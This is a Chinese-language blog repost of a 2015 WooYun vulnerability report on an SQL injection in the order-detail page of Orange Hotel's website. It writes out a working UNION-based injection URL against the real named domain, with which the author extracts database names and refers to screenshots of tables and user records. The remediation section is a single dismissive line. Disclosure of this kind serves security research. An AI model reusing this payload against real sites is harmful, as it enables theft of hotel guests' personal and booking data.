记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

桔子酒店主站存在高危安全漏洞(可影响大量用户与开房订单信息)

2015-03-28 14:00

注册好帐号后随便下单,然后看订单号部分,是个URI传值的请求,直接就存在SQL注射漏洞。

http://www.orangehotel.com.cn/User/orderdetail/id/-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7c,database(),0x7c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23

漏洞证明:

dbs.png



tables.png



只列取部分用户信息吧,不翻库了。

1.png



可能是内部人员的

2.png

修复方案:

注射漏洞嘛


知识来源: www.wooyun.org/bugs/wooyun-2015-096759

阅读:95536 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“桔子酒店主站存在高危安全漏洞(可影响大量用户与开房订单信息)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云